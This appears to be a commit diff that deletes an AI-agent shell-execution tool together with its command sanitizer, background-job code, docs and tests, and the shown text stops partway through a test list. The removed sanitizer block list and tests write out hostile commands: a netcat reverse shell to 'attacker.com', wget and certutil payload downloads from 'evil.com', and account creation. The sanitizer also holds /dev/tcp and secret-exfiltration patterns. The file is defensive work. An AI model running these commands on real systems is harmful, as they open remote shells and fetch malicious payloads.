feat: tools config frontend grouping and tools cleanup

This commit is contained in:
Richard Tang
2026-05-01 15:28:40 -07:00
parent 8c36b1575c
commit 12ffacccab
24 changed files with 125 additions and 1534 deletions
+2 -8
View File
@@ -72,10 +72,7 @@ verbatim; system + credential paths are on a deny list).
| `read_file` | Read file contents (with optional hashline anchors) |
| `write_file` | Create or overwrite a file |
| `edit_file` | Find/replace with fuzzy fallback |
| `hashline_edit` | Anchor-based structural edits validated by line hashes |
| `apply_patch` | Apply a diff_match_patch text |
| `search_files` | Grep file contents (`target='content'`) or list/find files (`target='files'`) — replaces grep, find, and ls |
| `execute_command_tool` | Execute shell commands |
| `save_data` / `load_data` | Persist and retrieve structured data across steps |
| `serve_file_to_user` | Serve a file for the user to download |
| `list_data_files` | List persisted data files in the session |
@@ -176,11 +173,8 @@ tools/
│ ├── file_ops.py # ALL file tools (read, write, edit, hashline_edit, search_files, apply_patch)
│ ├── credentials/ # Credential management
│ └── tools/ # Tool implementations
│ ├── example_tool/
├── file_system_toolkits/ # Shell only — file tools moved to file_ops.py
│ │ ├── security.py
│ │ ├── command_sanitizer.py
│ │ └── execute_command_tool/
│ ├── file_system_toolkits/ # Sandbox path helpers (security.py)
│ └── security.py
│ ├── web_search_tool/
│ ├── web_scrape_tool/
│ ├── pdf_read_tool/
-6
View File
@@ -59,11 +59,7 @@ from .docker_hub_tool import register_tools as register_docker_hub
from .duckduckgo_tool import register_tools as register_duckduckgo
from .email_tool import register_tools as register_email
from .exa_search_tool import register_tools as register_exa_search
from .example_tool import register_tools as register_example
from .excel_tool import register_tools as register_excel
from .file_system_toolkits.execute_command_tool import (
register_tools as register_execute_command,
)
from .freshdesk_tool import register_tools as register_freshdesk
from .github_tool import register_tools as register_github
from .gitlab_tool import register_tools as register_gitlab
@@ -157,7 +153,6 @@ def _register_verified(
"""Register verified (stable) tools."""
_verified_before = set(mcp._tool_manager._tools.keys())
# --- No credentials ---
register_example(mcp)
if register_web_scrape:
register_web_scrape(mcp)
register_pdf_read(mcp)
@@ -199,7 +194,6 @@ def _register_verified(
# defaults to CWD here; framework callers that own a session-specific
# workspace should call register_file_tools directly with home set.
register_file_tools(mcp)
register_execute_command(mcp)
register_csv(mcp)
register_excel(mcp)
@@ -1,26 +0,0 @@
# Example Tool
A template tool demonstrating the Aden tools pattern.
## Description
This tool processes text messages with optional transformations. It serves as a reference implementation for creating new tools using the FastMCP decorator pattern.
## Arguments
| Argument | Type | Required | Default | Description |
|----------|------|----------|---------|-------------|
| `message` | str | Yes | - | The message to process (1-1000 chars) |
| `uppercase` | bool | No | `False` | Convert message to uppercase |
| `repeat` | int | No | `1` | Number of times to repeat (1-10) |
## Environment Variables
This tool does not require any environment variables.
## Error Handling
Returns error strings for validation issues:
- `Error: message must be 1-1000 characters` - Empty or too long message
- `Error: repeat must be 1-10` - Repeat value out of range
- `Error processing message: <error>` - Unexpected error
@@ -1,5 +0,0 @@
"""Example Tool package."""
from .example_tool import register_tools
__all__ = ["register_tools"]
@@ -1,52 +0,0 @@
"""
Example Tool - A simple text processing tool for FastMCP.
Demonstrates native FastMCP tool registration pattern.
"""
from __future__ import annotations
from fastmcp import FastMCP
def register_tools(mcp: FastMCP) -> None:
    """Register example tools with the MCP server."""

    @mcp.tool()
    def example_tool(
        message: str,
        uppercase: bool = False,
        repeat: int = 1,
    ) -> str:
        """
        A simple example tool that processes text messages.

        Use this tool when you need to transform or repeat text.

        Args:
            message: The message to process (1-1000 chars)
            uppercase: If True, convert the message to uppercase
            repeat: Number of times to repeat the message (1-10)

        Returns:
            The processed message string
        """
        try:
            # Guard-clause validation before any transformation.
            if not message or len(message) > 1000:
                return "Error: message must be 1-1000 characters"
            if not 1 <= repeat <= 10:
                return "Error: repeat must be 1-10"

            # Apply the optional transformations in order.
            processed = message.upper() if uppercase else message
            if repeat > 1:
                processed = " ".join([processed] * repeat)
            return processed
        except Exception as e:
            return f"Error processing message: {str(e)}"
@@ -1,16 +1,15 @@
# File System Toolkits (post-consolidation)
This package now contains only the shell tool. **All file tools live in
`aden_tools.file_ops`** (read_file, write_file, edit_file, hashline_edit,
search_files, apply_patch) — they share one path policy and one home dir.
This package contains only sandbox path helpers used by `csv_tool` and
`excel_tool`. **All file tools live in `aden_tools.file_ops`** (read_file,
write_file, edit_file, hashline_edit, search_files, apply_patch) — they
share one path policy and one home dir.
## Sub-modules
| Module | Description |
|--------|-------------|
| `execute_command_tool/` | Shell command execution with sanitization (run_command, bash_kill, bash_output) |
| `command_sanitizer.py` | Validates and sanitizes shell command strings |
| `security.py` | Sandbox path resolver still used by execute_command_tool |
| `security.py` | Sandbox path resolver used by csv_tool and excel_tool |
## File tools
@@ -31,11 +30,3 @@ from aden_tools.file_ops import register_file_tools
register_file_tools(mcp, home="/path/to/agent/home")
```
For shell:
```python
from aden_tools.tools.file_system_toolkits.execute_command_tool import register_tools as register_shell
register_shell(mcp)
```
@@ -1,202 +0,0 @@
"""Command sanitization to prevent shell injection attacks.
Validates commands against a blocklist of dangerous patterns before they
are passed to subprocess.run(shell=True). This prevents prompt injection
attacks from tricking AI agents into running destructive or exfiltration
commands on the host system.
Design: uses a blocklist (not allowlist) so agents can run arbitrary
dev commands (uv, pytest, git, etc.) while blocking known-dangerous ops.
This blocks explicit nested shell executables (bash, sh, pwsh, etc.),
but callers still execute via shell=True, so shell parsing remains a
known limitation of this guardrail.
"""
import re
__all__ = ["CommandBlockedError", "validate_command"]
class CommandBlockedError(Exception):
"""Raised when a command is blocked by the safety filter."""
pass
# ---------------------------------------------------------------------------
# Blocklists
# ---------------------------------------------------------------------------
# Executables / prefixes that are never safe for an AI agent to invoke.
# Matched against each segment of a compound command (split on ; | && ||).
_BLOCKED_EXECUTABLES: list[str] = [
# Network exfiltration
"wget",
"nc",
"ncat",
"netcat",
"nmap",
"ssh",
"scp",
"sftp",
"ftp",
"telnet",
"rsync",
# Windows network tools
"invoke-webrequest",
"invoke-restmethod",
"iwr",
"irm",
"certutil",
# User / privilege escalation
"useradd",
"userdel",
"usermod",
"adduser",
"deluser",
"passwd",
"chpasswd",
"visudo",
"net", # net user, net localgroup, etc.
# System destructive
"shutdown",
"reboot",
"halt",
"poweroff",
"init",
"systemctl",
"mkfs",
"fdisk",
"diskpart",
"format", # Windows format
# Reverse shell / code exec wrappers
"bash",
"sh",
"zsh",
"dash",
"csh",
"ksh",
"powershell",
"pwsh",
"cmd",
"cmd.exe",
"wscript",
"cscript",
"mshta",
"regsvr32",
# Credential / secret access
"security", # macOS keychain: security find-generic-password
]
# Patterns matched against the full (joined) command string.
# These catch dangerous flags and argument combos even when the
# executable itself isn't blocked (e.g. python -c '...').
_BLOCKED_PATTERNS: list[re.Pattern[str]] = [
# rm with force/recursive flags targeting root or broad paths
re.compile(r"\brm\s+(-[rRf]+\s+)*(/|~|\.\.|C:\\)", re.IGNORECASE),
# del /s /q (Windows recursive delete)
re.compile(r"\bdel\s+.*/[sS]", re.IGNORECASE),
re.compile(r"\brmdir\s+/[sS]", re.IGNORECASE),
# dd writing to disks/partitions
re.compile(r"\bdd\s+.*\bof=\s*/dev/", re.IGNORECASE),
# chmod 777 / chmod -R 777
re.compile(r"\bchmod\s+(-R\s+)?(777|666)\b", re.IGNORECASE),
# sudo — agents should never escalate privileges
re.compile(r"\bsudo\b", re.IGNORECASE),
# su — switch user
re.compile(r"\bsu\s+", re.IGNORECASE),
# ruby/perl with -e flag (inline code execution)
re.compile(r"\bruby\s+-e\b", re.IGNORECASE),
re.compile(r"\bperl\s+-e\b", re.IGNORECASE),
# powershell encoded commands
re.compile(r"\bpowershell\b.*-enc", re.IGNORECASE),
# Reverse shell patterns
re.compile(r"/dev/tcp/", re.IGNORECASE),
re.compile(r"\bmkfifo\b", re.IGNORECASE),
# eval / exec as standalone commands
re.compile(r"^\s*eval\s+", re.IGNORECASE | re.MULTILINE),
re.compile(r"^\s*exec\s+", re.IGNORECASE | re.MULTILINE),
# Reading well-known secret files
re.compile(r"\bcat\s+.*(\.ssh|/etc/shadow|/etc/passwd|credential_key)", re.IGNORECASE),
re.compile(r"\btype\s+.*credential_key", re.IGNORECASE),
# Backtick or $() command substitution containing blocked executables
re.compile(r"\$\(.*\b(wget|nc|ncat)\b.*\)", re.IGNORECASE),
re.compile(r"`.*\b(wget|nc|ncat)\b.*`", re.IGNORECASE),
# Environment variable exfiltration via echo/print
re.compile(r"\becho\s+.*\$\{?.*(API_KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL)", re.IGNORECASE),
# >& /dev/tcp (bash reverse shell)
re.compile(r">&\s*/dev/tcp", re.IGNORECASE),
]
# Shell operators used to split compound commands.
# We check each segment individually against _BLOCKED_EXECUTABLES.
_SHELL_SPLIT_PATTERN = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")
def _normalize_executable_name(token: str) -> str:
"""Normalize executable names for matching (e.g. cmd.exe -> cmd)."""
normalized = token.lower().strip("\"'")
normalized = re.split(r"[\\/]", normalized)[-1]
if normalized.endswith(".exe"):
return normalized[:-4]
return normalized
def _extract_executable(segment: str) -> str:
"""Extract the first token (executable) from a command segment.
Strips environment variable assignments (FOO=bar) from the front.
"""
segment = segment.strip()
# Skip env var assignments at the start: VAR=value cmd ...
tokens = segment.split()
for token in tokens:
if "=" in token and not token.startswith("-"):
continue
# Return lowercase for case-insensitive matching
return _normalize_executable_name(token)
return ""
def validate_command(command: str) -> None:
"""Validate a command string against the safety blocklists.
Args:
command: The shell command string to validate.
Raises:
CommandBlockedError: If the command matches any blocked pattern.
"""
if not command or not command.strip():
return
stripped = command.strip()
# --- Check full-command patterns ---
for pattern in _BLOCKED_PATTERNS:
match = pattern.search(stripped)
if match:
raise CommandBlockedError(
f"Command blocked for safety: matched dangerous pattern '{match.group()}'. "
f"If this is a false positive, please modify the command."
)
# --- Check each segment for blocked executables ---
segments = _SHELL_SPLIT_PATTERN.split(stripped)
for segment in segments:
segment = segment.strip()
if not segment:
continue
executable = _extract_executable(segment)
# Check exact match and prefix-before-dot (e.g. mkfs.ext4 -> mkfs)
names_to_check = {executable}
if "." in executable:
names_to_check.add(executable.split(".")[0])
if names_to_check & set(_BLOCKED_EXECUTABLES):
matched = (names_to_check & set(_BLOCKED_EXECUTABLES)).pop()
raise CommandBlockedError(
f"Command blocked for safety: '{matched}' is not allowed. "
f"Blocked categories: network tools, privilege escalation, "
f"system destructive commands, shell interpreters."
)
@@ -1,152 +0,0 @@
# Execute Command Tool
Executes shell commands within the secure session sandbox.
## Description
The `execute_command_tool` allows you to run arbitrary shell commands in a sandboxed environment. Commands are executed with a 60-second timeout and capture both stdout and stderr output.
## Use Cases
- Running build commands (npm build, make, etc.)
- Executing tests
- Running linters or formatters
- Performing git operations
- Installing dependencies
## Usage
```python
execute_command_tool(
command="npm install",
workspace_id="workspace-123",
agent_id="agent-456",
session_id="session-789",
cwd="project"
)
```
## Arguments
| Argument | Type | Required | Default | Description |
|----------|------|----------|---------|-------------|
| `command` | str | Yes | - | The shell command to execute |
| `workspace_id` | str | Yes | - | The ID of the workspace |
| `agent_id` | str | Yes | - | The ID of the agent |
| `session_id` | str | Yes | - | The ID of the current session |
| `cwd` | str | No | "." | The working directory for the command (relative to session root) |
## Returns
Returns a dictionary with the following structure:
**Success:**
```python
{
"success": True,
"command": "npm install",
"return_code": 0,
"stdout": "added 42 packages in 3s",
"stderr": "",
"cwd": "project"
}
```
**Command failure (non-zero exit):**
```python
{
"success": True, # Command executed successfully, but exited with error code
"command": "npm test",
"return_code": 1,
"stdout": "",
"stderr": "Error: Tests failed",
"cwd": "."
}
```
**Timeout:**
```python
{
"error": "Command timed out after 60 seconds"
}
```
**Error:**
```python
{
"error": "Failed to execute command: [error message]"
}
```
## Error Handling
- Returns an error dict if the command times out (60 second limit)
- Returns an error dict if the command cannot be executed
- Returns success with non-zero return_code if command runs but fails
- Commands are executed in a sandboxed session environment
- Working directory defaults to session root if not specified
## Security Considerations
- Commands are executed within the session sandbox only
- File access is restricted to the session directory
- Network access depends on sandbox configuration
- Commands run with the permissions of the session user
- Use with caution as shell injection is possible
## Examples
### Running a build command
```python
result = execute_command_tool(
command="npm run build",
workspace_id="ws-1",
agent_id="agent-1",
session_id="session-1",
cwd="frontend"
)
# Returns: {"success": True, "return_code": 0, "stdout": "Build complete", ...}
```
### Running tests with output
```python
result = execute_command_tool(
command="pytest -v",
workspace_id="ws-1",
agent_id="agent-1",
session_id="session-1"
)
# Returns: {"success": True, "return_code": 0, "stdout": "test output...", "stderr": ""}
```
### Handling command failures
```python
result = execute_command_tool(
command="nonexistent-command",
workspace_id="ws-1",
agent_id="agent-1",
session_id="session-1"
)
# Returns: {"success": True, "return_code": 127, "stderr": "command not found", ...}
```
### Running git commands
```python
result = execute_command_tool(
command="git status",
workspace_id="ws-1",
agent_id="agent-1",
session_id="session-1",
cwd="repo"
)
# Returns: {"success": True, "return_code": 0, "stdout": "On branch main...", ...}
```
## Notes
- 60-second timeout for all commands
- Commands are executed using shell=True (supports pipes, redirects, etc.)
- Both stdout and stderr are captured separately
- Return code 0 typically indicates success
- Working directory is created if it doesn't exist
- Command output is returned as text (UTF-8 encoding)
@@ -1,3 +0,0 @@
from .execute_command_tool import register_tools
__all__ = ["register_tools"]
@@ -1,211 +0,0 @@
"""In-process registry of long-running shell jobs spawned by
``execute_command_tool(run_in_background=True)``.
Jobs are keyed on a short id the tool returns to the agent. The agent
can then call ``bash_output(id=...)`` to poll for new output and
``bash_kill(id=...)`` to terminate. Each job is scoped to an
``agent_id`` so two agents sharing the same MCP server can't see or
kill each other's work.
The stdout/stderr buffers are bounded rolling tail buffers (64 KB each)
so a runaway process can't exhaust memory. Older bytes are dropped with
a one-time ``[truncated N bytes]`` marker prepended to the returned
text.
"""
from __future__ import annotations
import asyncio
import time
from collections import deque
from dataclasses import dataclass, field
from uuid import uuid4
# 64 KB rolling window per stream. Large enough for long build logs,
# small enough that a bash infinite loop can't OOM the MCP process.
_MAX_BUFFER_BYTES = 64 * 1024
@dataclass
class _RingBuffer:
    """Append-only byte buffer with a hard byte ceiling and per-read
    offset tracking so each bash_output call only returns new bytes.
    """

    # Hard ceiling on buffered bytes (64 KB default, see _MAX_BUFFER_BYTES).
    max_bytes: int = _MAX_BUFFER_BYTES
    # deque of (global_offset, bytes) chunks. global_offset is the total
    # bytes written prior to this chunk; lets us compute "bytes since
    # last poll" without copying.
    _chunks: deque[tuple[int, bytes]] = field(default_factory=deque)
    # Total bytes ever written (monotonically increasing).
    _total_written: int = 0
    # Total bytes evicted from the front of the window so far.
    _total_dropped: int = 0
    # Global offset of the next unread byte for read_new().
    _read_cursor: int = 0

    def write(self, data: bytes) -> None:
        """Append *data*, then evict oldest chunks to stay under max_bytes."""
        if not data:
            return
        self._chunks.append((self._total_written, data))
        self._total_written += len(data)
        # Evict from the front until we're under the ceiling.
        current_bytes = sum(len(c) for _, c in self._chunks)
        while current_bytes > self.max_bytes and self._chunks:
            dropped_offset, dropped = self._chunks.popleft()
            self._total_dropped += len(dropped)
            current_bytes -= len(dropped)
            # Push the read cursor forward if the reader was still
            # pointing at bytes we just evicted.
            if self._read_cursor < dropped_offset + len(dropped):
                self._read_cursor = dropped_offset + len(dropped)

    def read_new(self) -> str:
        """Return any bytes since the last call, as decoded text.

        Includes a ``[truncated N bytes]`` prefix if rolling-window
        eviction dropped any bytes the reader hadn't yet consumed.
        """
        chunks_out: list[bytes] = []
        cursor = self._read_cursor
        for offset, chunk in self._chunks:
            end = offset + len(chunk)
            if end <= cursor:
                # Entire chunk was already consumed by a previous poll.
                continue
            # A chunk may straddle the cursor: take only the unread tail.
            start_in_chunk = max(0, cursor - offset)
            chunks_out.append(chunk[start_in_chunk:])
            cursor = end
        self._read_cursor = cursor
        raw = b"".join(chunks_out)
        # errors="replace": child output is arbitrary bytes, never raise.
        text = raw.decode("utf-8", errors="replace")
        # Surface eviction ONCE per poll so the agent knows to check
        # the file system for larger logs instead of assuming it's got
        # the full output.
        if self._total_dropped > 0 and text:
            text = f"[truncated {self._total_dropped} earlier bytes]\n" + text
        return text
@dataclass
class BackgroundJob:
    # Registry record for one background shell process. Field order
    # matters for the dataclass __init__: defaulted fields come last.
    id: str  # short id handed back to the agent (see _short_id)
    agent_id: str  # owner scope; other agents can't reach this job
    command: str  # original shell command string
    cwd: str  # resolved working directory the process was started in
    started_at: float  # wall-clock start time (time.time())
    process: asyncio.subprocess.Process
    stdout_buf: _RingBuffer = field(default_factory=_RingBuffer)
    stderr_buf: _RingBuffer = field(default_factory=_RingBuffer)
    # Task draining the child's stdout/stderr into the ring buffers.
    _pump_task: asyncio.Task | None = None
    # Exit code surfaced by the pump once the process has finished.
    exit_code: int | None = None

    def status(self) -> str:
        """Return "running" or "exited(N)" for this job."""
        if self.exit_code is not None:
            return f"exited({self.exit_code})"
        if self.process.returncode is not None:
            # Not yet surfaced by the pump but already finished.
            return f"exited({self.process.returncode})"
        return "running"
# agent_id -> {job_id -> BackgroundJob}
_jobs: dict[str, dict[str, BackgroundJob]] = {}
_jobs_lock = asyncio.Lock()
def _short_id() -> str:
    """Return a fresh 8-character hex job id."""
    full_hex = uuid4().hex
    return full_hex[:8]
async def _pump(job: BackgroundJob) -> None:
    """Drain the child process's stdout/stderr into the ring buffers."""
    proc = job.process

    async def _drain(stream: asyncio.StreamReader | None, buf: _RingBuffer) -> None:
        # Stream is None when the pipe wasn't requested; nothing to drain.
        if stream is None:
            return
        while True:
            chunk = await stream.read(4096)
            if not chunk:
                # EOF: the child closed this stream.
                return
            buf.write(chunk)

    # Drain both pipes concurrently so neither pipe can fill up and
    # block the child process.
    await asyncio.gather(
        _drain(proc.stdout, job.stdout_buf),
        _drain(proc.stderr, job.stderr_buf),
    )
    # Record the exit code only after both streams hit EOF, so all
    # output is in the buffers before status() reports "exited".
    job.exit_code = await proc.wait()
async def spawn(command: str, cwd: str, agent_id: str) -> BackgroundJob:
    """Start a subprocess in the background and register it. The caller
    holds the job id returned from here and can poll via ``get()``.

    Raises whatever ``asyncio.create_subprocess_shell`` raises if the
    process cannot be spawned; nothing is registered in that case.
    """
    proc = await asyncio.create_subprocess_shell(
        command,
        cwd=cwd,
        stdout=asyncio.subprocess.PIPE,
        stderr=asyncio.subprocess.PIPE,
    )
    job = BackgroundJob(
        id=_short_id(),
        agent_id=agent_id,
        command=command,
        cwd=cwd,
        started_at=time.time(),
        process=proc,
    )
    # Start pumping IO in the background so the ring buffers stay warm
    # even if the agent doesn't poll for a while.
    job._pump_task = asyncio.create_task(_pump(job))
    # Register under the lock so concurrent spawns/kills don't race on
    # the per-agent dict.
    async with _jobs_lock:
        _jobs.setdefault(agent_id, {})[job.id] = job
    return job
async def get(agent_id: str, job_id: str) -> BackgroundJob | None:
    """Look up a background job in the agent's scope; None if absent."""
    async with _jobs_lock:
        agent_scope = _jobs.get(agent_id)
        return agent_scope.get(job_id) if agent_scope else None
async def kill(agent_id: str, job_id: str, grace_seconds: float = 3.0) -> str:
    """SIGTERM a background job, escalating to SIGKILL after a grace
    period. Returns a human-readable status string.

    Args:
        agent_id: Owner scope of the job.
        job_id: Id returned by ``spawn``.
        grace_seconds: How long to wait after SIGTERM before SIGKILL.
    """
    job = await get(agent_id, job_id)
    if job is None:
        return f"no background job with id '{job_id}'"
    if job.process.returncode is not None:
        # Already finished — nothing to signal, just deregister below.
        status = f"already exited with code {job.process.returncode}"
    else:
        try:
            job.process.terminate()
        except ProcessLookupError:
            # Process already reaped by the OS between the check and here.
            pass
        try:
            await asyncio.wait_for(job.process.wait(), timeout=grace_seconds)
            status = f"terminated cleanly (exit={job.process.returncode})"
        except TimeoutError:
            # Did not exit within the grace period — escalate.
            try:
                job.process.kill()
            except ProcessLookupError:
                pass
            await job.process.wait()
            status = f"killed (SIGKILL, exit={job.process.returncode})"
    # Deregister after kill so the id is no longer reachable.
    async with _jobs_lock:
        scope = _jobs.get(agent_id)
        if scope is not None:
            scope.pop(job_id, None)
    return status
async def clear_agent(agent_id: str) -> None:
    """Test hook: kill every job owned by ``agent_id``."""
    async with _jobs_lock:
        scope = _jobs.pop(agent_id, {})
        # NOTE(review): jobs are killed while still holding the registry
        # lock — acceptable for a test-only hook, but confirm this is not
        # called on a hot path.
        for job in scope.values():
            if job.process.returncode is None:
                try:
                    job.process.kill()
                except ProcessLookupError:
                    # Process already gone; nothing to kill.
                    pass
                await job.process.wait()
@@ -1,222 +0,0 @@
"""Shell command execution tool.
Three tools are registered:
* ``execute_command_tool`` runs a command synchronously with a per-call
timeout (default 120s, max 600s). Uses ``asyncio.create_subprocess_shell``
so the MCP event loop is not blocked while the child runs.
* ``bash_output`` polls a background job started with
``execute_command_tool(run_in_background=True)`` and returns any new
stdout/stderr since the last poll plus the current status.
* ``bash_kill`` terminates a background job (SIGTERM then SIGKILL after
a 3-second grace period).
All three go through the same pre-execution safety blocklist in
``command_sanitizer.py``.
"""
from __future__ import annotations
import asyncio
import os
import time
from mcp.server.fastmcp import FastMCP
from ..command_sanitizer import CommandBlockedError, validate_command
from ..security import AGENT_SANDBOXES_DIR, get_sandboxed_path
from .background_jobs import get as get_job, kill as kill_job, spawn as spawn_job
# Bounds on per-call timeout. 1s minimum prevents accidental zeros that
# would cause every command to fail. 600s maximum (10 min) is the same
# ceiling Claude Code uses for its Bash tool; builds and test suites
# longer than that should use run_in_background instead.
_MIN_TIMEOUT = 1
_MAX_TIMEOUT = 600
_DEFAULT_TIMEOUT = 120
def _resolve_cwd(cwd: str | None, agent_id: str) -> str:
    """Resolve *cwd* inside the agent sandbox, creating the sandbox root.

    Falls back to the sandbox root when no cwd is given.
    """
    sandbox_root = os.path.join(AGENT_SANDBOXES_DIR, agent_id, "current")
    os.makedirs(sandbox_root, exist_ok=True)
    if not cwd:
        return sandbox_root
    return get_sandboxed_path(cwd, agent_id)
def register_tools(mcp: FastMCP) -> None:
    """Register command execution tools with the MCP server."""

    @mcp.tool()
    async def execute_command_tool(
        command: str,
        agent_id: str,
        cwd: str | None = None,
        timeout_seconds: int = _DEFAULT_TIMEOUT,
        run_in_background: bool = False,
    ) -> dict:
        """
        Purpose
            Execute a shell command within the agent sandbox.

        When to use
            Run validators, linters, builds, test suites
            Generate derived artifacts (indexes, summaries)
            Perform controlled maintenance tasks
            Start long-running processes via ``run_in_background=True``
            (dev servers, watchers, file-triggered builds)

        Rules & Constraints
            No network access unless explicitly allowed
            No destructive commands (rm -rf, system modification)
            Commands are validated against a safety blocklist before
            execution. The blocklist runs through shell=True, so it
            only prevents explicit nested shell executables.
            timeout_seconds is clamped to [1, 600]. For longer-running
            work use run_in_background=True + bash_output to poll.

        Args:
            command: The shell command to execute.
            agent_id: The ID of the agent (auto-injected).
            cwd: Working directory for the command (relative to the
                agent sandbox). Defaults to the sandbox root.
            timeout_seconds: Max wall-clock seconds the foreground
                command is allowed to run. Ignored when
                run_in_background=True. Default 120, max 600.
            run_in_background: If True, spawn the command and return
                immediately with a job id. Use bash_output(id=...) to
                read output and bash_kill(id=...) to stop it.

        Returns:
            For foreground commands: dict with stdout, stderr, return_code,
            elapsed_seconds.
            For background commands: dict with id, pid, started_at, and
            instructions for polling / killing the job.
            On error: dict with an "error" key.
        """
        # Safety blocklist runs before anything touches the filesystem.
        try:
            validate_command(command)
        except CommandBlockedError as e:
            return {"error": f"Command blocked: {e}", "blocked": True}

        try:
            secure_cwd = _resolve_cwd(cwd, agent_id)
        except Exception as e:
            return {"error": f"Failed to resolve cwd: {e}"}

        if run_in_background:
            try:
                job = await spawn_job(command, secure_cwd, agent_id)
            except Exception as e:
                return {"error": f"Failed to spawn background job: {e}"}
            return {
                "success": True,
                "background": True,
                "id": job.id,
                "pid": job.process.pid,
                "command": command,
                "cwd": cwd or ".",
                "started_at": job.started_at,
                "hint": (
                    "Background job started. Call "
                    f"bash_output(id='{job.id}') to read output, or "
                    f"bash_kill(id='{job.id}') to terminate it."
                ),
            }

        # Foreground path: clamp timeout, spawn, wait with a watchdog.
        try:
            timeout = max(_MIN_TIMEOUT, min(_MAX_TIMEOUT, int(timeout_seconds)))
        except (TypeError, ValueError):
            timeout = _DEFAULT_TIMEOUT

        started = time.monotonic()
        try:
            proc = await asyncio.create_subprocess_shell(
                command,
                cwd=secure_cwd,
                stdout=asyncio.subprocess.PIPE,
                stderr=asyncio.subprocess.PIPE,
            )
        except Exception as e:
            return {"error": f"Failed to execute command: {e}"}

        try:
            stdout_b, stderr_b = await asyncio.wait_for(proc.communicate(), timeout=timeout)
        except TimeoutError:
            # Child is still running: kill it, drain what it already
            # wrote so the agent gets a partial log, then report.
            try:
                proc.kill()
            except ProcessLookupError:
                pass
            try:
                stdout_b, stderr_b = await asyncio.wait_for(proc.communicate(), timeout=2.0)
            except Exception:
                # FIX: was `except (TimeoutError, Exception)` — a redundant
                # exception tuple (Exception already covers TimeoutError,
                # flagged by ruff B014). Behavior is unchanged: any failure
                # to drain yields empty output.
                stdout_b, stderr_b = b"", b""
            elapsed = round(time.monotonic() - started, 2)
            return {
                "error": (
                    f"Command timed out after {timeout} seconds. "
                    f"For longer work pass timeout_seconds (max 600) or "
                    f"run_in_background=True."
                ),
                "timed_out": True,
                "elapsed_seconds": elapsed,
                "stdout": stdout_b.decode("utf-8", errors="replace"),
                "stderr": stderr_b.decode("utf-8", errors="replace"),
            }
        except Exception as e:
            return {"error": f"Failed while running command: {e}"}

        return {
            "success": True,
            "command": command,
            "return_code": proc.returncode,
            "stdout": stdout_b.decode("utf-8", errors="replace"),
            "stderr": stderr_b.decode("utf-8", errors="replace"),
            "cwd": cwd or ".",
            "elapsed_seconds": round(time.monotonic() - started, 2),
        }

    @mcp.tool()
    async def bash_output(id: str, agent_id: str) -> dict:
        """Poll a background command for new output and its current status.

        Returns any stdout/stderr bytes written since the last call.
        The status is one of "running", "exited(N)", or "killed".
        When the job has finished and all output has been consumed, it
        is removed from the registry on the next poll.

        Args:
            id: The job id returned from
                execute_command_tool(run_in_background=True).
            agent_id: The ID of the agent (auto-injected).
        """
        job = await get_job(agent_id, id)
        if job is None:
            return {"error": f"no background job with id '{id}'"}
        new_stdout = job.stdout_buf.read_new()
        new_stderr = job.stderr_buf.read_new()
        return {
            "id": id,
            "status": job.status(),
            "stdout": new_stdout,
            "stderr": new_stderr,
            "elapsed_seconds": round(time.time() - job.started_at, 2),
        }

    @mcp.tool()
    async def bash_kill(id: str, agent_id: str) -> dict:
        """Terminate a background command.

        Sends SIGTERM, waits up to 3 seconds, then escalates to SIGKILL
        if the process is still alive. The job id is then deregistered.

        Args:
            id: The job id returned from
                execute_command_tool(run_in_background=True).
            agent_id: The ID of the agent (auto-injected).
        """
        status = await kill_job(agent_id, id)
        return {"id": id, "status": status}
-238
View File
@@ -1,238 +0,0 @@
"""Tests for command_sanitizer — validates that dangerous commands are blocked
while normal development commands pass through unmodified."""
import pytest
from aden_tools.tools.file_system_toolkits.command_sanitizer import (
CommandBlockedError,
validate_command,
)
# ---------------------------------------------------------------------------
# Safe commands that MUST pass validation
# ---------------------------------------------------------------------------
class TestSafeCommands:
    """Common dev commands that should never be blocked."""

    @pytest.mark.parametrize(
        "cmd",
        [
            # Each entry is an exact command string fed to validate_command;
            # the test passes only if no CommandBlockedError is raised.
            "echo hello",
            "echo 'Hello World'",
            "uv run pytest tests/ -v",
            "uv pip install requests",
            "git status",
            "git diff --cached",
            "git log -n 5",
            "git add .",
            "git commit -m 'fix: typo'",
            "python script.py",
            "python -m pytest",
            "python3 script.py",
            "python manage.py migrate",
            "ls -la",
            "dir /a",
            "cat README.md",
            "head -n 20 file.py",
            "tail -f log.txt",
            "grep -r 'pattern' src/",
            "find . -name '*.py'",
            "ruff check .",
            "ruff format --check .",
            "mypy src/",
            "npm install",
            "npm run build",
            "npm test",
            "node server.js",
            "make test",
            "make check",
            "cargo build",
            "go build ./...",
            "dotnet build",
            "pip install -r requirements.txt",
            # Compound commands: each segment must pass individually.
            "cd src && ls",
            "echo hello && echo world",
            "cat file.py | grep pattern",
            "pytest tests/ -v --tb=short",
            # rm/del without root-targeting recursive flags are allowed.
            "rm temp.txt",
            "rm -f temp.log",
            "del temp.txt",
            "mkdir -p output/logs",
            "cp file1.py file2.py",
            "mv old.txt new.txt",
            "wc -l *.py",
            "sort output.txt",
            "diff file1.py file2.py",
            "tree src/",
            # curl is deliberately not on the network blocklist.
            "curl https://api.example.com/data",
            "curl -X POST -H 'Content-Type: application/json' https://api.example.com",
        ],
    )
    def test_safe_command_passes(self, cmd):
        """Should not raise for common dev commands."""
        validate_command(cmd)  # should not raise

    def test_empty_command(self):
        """Empty and whitespace-only commands should pass."""
        validate_command("")
        validate_command(" ")
        validate_command(None)  # type: ignore[arg-type] — edge case
# ---------------------------------------------------------------------------
# Dangerous commands that MUST be blocked
# ---------------------------------------------------------------------------
class TestBlockedExecutables:
    """Commands using blocked executables should raise CommandBlockedError."""

    @pytest.mark.parametrize(
        "cmd",
        [
            # Network exfiltration
            "wget http://evil.com/payload",
            "nc -e /bin/sh attacker.com 4444",
            "ncat attacker.com 1234",
            "nmap -sS 192.168.1.0/24",
            "ssh user@remote",
            "scp file.txt user@remote:/tmp/",
            "ftp ftp.example.com",
            "telnet example.com 80",
            "rsync -avz . user@remote:/data",
            # Windows network tools
            "invoke-webrequest https://evil.com",
            "iwr https://evil.com",
            "certutil -urlcache -split -f http://evil.com/payload",
            # User escalation
            "useradd hacker",
            "userdel admin",
            "adduser hacker",
            "passwd root",
            "net user hacker P@ss123 /add",
            "net localgroup administrators hacker /add",
            # System destructive
            "shutdown /s /t 0",
            "reboot",
            "halt",
            "poweroff",
            # mkfs.ext4 exercises the prefix-before-dot normalization.
            "mkfs.ext4 /dev/sda1",
            "diskpart",
            # Shell interpreters (direct invocation)
